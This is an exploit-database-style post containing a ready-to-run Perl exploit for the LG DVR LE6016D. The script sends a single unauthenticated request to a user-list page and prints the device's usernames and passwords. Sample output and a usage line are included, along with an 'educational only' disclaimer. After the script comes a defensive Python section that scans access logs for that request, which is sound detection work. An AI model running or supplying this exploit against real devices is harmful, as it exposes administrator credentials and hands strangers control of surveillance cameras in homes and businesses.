LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit
Source: todor.donev at gmail.com  Author: Donev  Published: 2015-02-11
#!/usr/bin/perl
#
#              LG DVR LE6016D unauthenticated remote
#               users/passwords disclosure exploit
#
#
#                Copyright 2015 (c) Todor Donev
#                  <todor.donev at gmail.com>
#                http://www.ethical-hacker.org/
####
#
#  Digital video recorder (DVR) surveillance is the use of cameras,
#  often hidden or concealed, that use DVR technology to record
#  video for playback or immediate viewing. As technological
#  innovations have made improvements in the security and
#  surveillance industry, DVR surveillance has become more
#  prominent and allows for easier and more versatile security
#  systems in homes and businesses. A DVR surveillance security
#  system can be designed for indoor use or outdoor use and can
#  often involve hidden security cameras, concealed “nanny cams”
#  for home security, and even personal recording devices hidden
#  on a person.
#
####
#
#  Description:
#  No authentication (login) is required to exploit this vulnerability.
#  This program demonstrates how an unpatched security bug would enable
#  hackers to gain control of a vulnerable device while sitting
#  behind their keyboard, potentially thousands of miles away.
#  An unauthenticated attacker that is connected to the DVR may be
#  able to retrieve the device's administrator password, allowing them
#  to directly access the device's configuration control panel.
#
####
#
#  Disclaimer:
#  This and previous programs are for educational purposes ONLY. Do not
#  use them without permission. The usual disclaimer applies, especially
#  the fact that Todor Donev is not liable for any damages caused by
#  direct or indirect use of the information or functionality provided
#  by these programs. The author or any Internet provider bears NO
#  responsibility for content or misuse of these programs or any
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.)
#  caused by the use of these programs is not Todor Donev's
#  responsibility.
#
####
#                Use them at your own risk!
####
#
#         $ perl lg.pl 133.7.133.7:80
#            LG DVR LE6016D unauthenticated remote
#              users/passwords disclosure exploit
#                    u/p: admin/000000
#                    u/p: user1/000000
#                    u/p: user2/000000
#                    u/p: user3/000000
#                    u/p: LOGOUT/000000
#               Copyright 2015 (c) Todor Donev
#                 <todor.donev at gmail.com>
#               http://www.ethical-hacker.org/
#
####
    
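use LWP::Simple;
print "   LG DVR LE6016D unauthenticated remote\n     users/passwords disclosure exploit\n";
# No target given: print usage and exit.
if (@ARGV == 0) {&usg; &foot;}
# The last command-line argument is used as the target (host:port).
while (@ARGV > 0) {
    $t = shift(@ARGV);
}
# A single GET with no credentials; the response lists the device accounts.
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
# Print up to five <name>/<pw> pairs; /g resumes after the previous match.
for (my $i=0; $i <= 4; $i++){
    if  ($r =~ m/<name>(.*)<\/name>/g){
        print "           u\/p: $1\/";
    }
    if  ($r =~ m/<pw>(.*)<\/pw>/g){
        print "$1\n";
    }
}
&foot;
# Usage message.
sub usg(){
    print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
# Footer banner; also terminates the script.
sub foot(){
    print "      Copyright 2015 (c) Todor Donev\n        <todor.donev at gmail.com>\n";
    print "      http://www.ethical-hacker.org/\n";
    exit;
}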
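
The request this script sends is easy to spot in HTTP logs. The Python below is an added example, not part of the original post: it scans access-log lines for requests to /dvr/wwwroot/user.cgi and marks the ones that were answered with a 2xx status. The Combined Log Format (for instance from a reverse proxy in front of the DVR), the sample lines and all function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Path fetched by the script above; a 2xx reply to it carries the account list.
SENSITIVE_PATH = "/dvr/wwwroot/user.cgi"

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.9 - - [11/Feb/2015:10:02:11 +0000] "GET /dvr/wwwroot/user.cgi HTTP/1.1" 200 612 "-" "LWP::Simple/6.00"',
    '198.51.100.4 - - [11/Feb/2015:10:05:40 +0000] "GET /dvr/./wwwroot/%75ser.cgi?x=1 HTTP/1.1" 200 612 "-" "curl/7.38.0"',
    '198.51.100.4 - - [11/Feb/2015:10:06:02 +0000] "GET /DVR/wwwroot/user.cgi HTTP/1.1" 403 0 "-" "curl/7.38.0"',
    '192.0.2.20 - - [11/Feb/2015:10:07:15 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

def normalize(target):
    """Reduce a request target to a canonical lower-case path for comparison."""
    if target.startswith(("http://", "https://")):   # absolute-form target
        target = urlsplit(target).path
    path = unquote(target.split("?", 1)[0])          # drop query, percent-decode
    # Collapse //, ./ and ../; lower-casing over-matches rather than misses.
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def scan(lines):
    """Return one finding per request for the user list; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize(m["target"]) != SENSITIVE_PATH:
            continue
        findings.append({
            "ip": m["ip"], "time": m["time"], "status": int(m["status"]),
            "exposed": m["status"].startswith("2"),  # 2xx: list was likely served
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any finding with "exposed" set means the account list was probably returned, so the passwords on that device should be treated as disclosed.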

 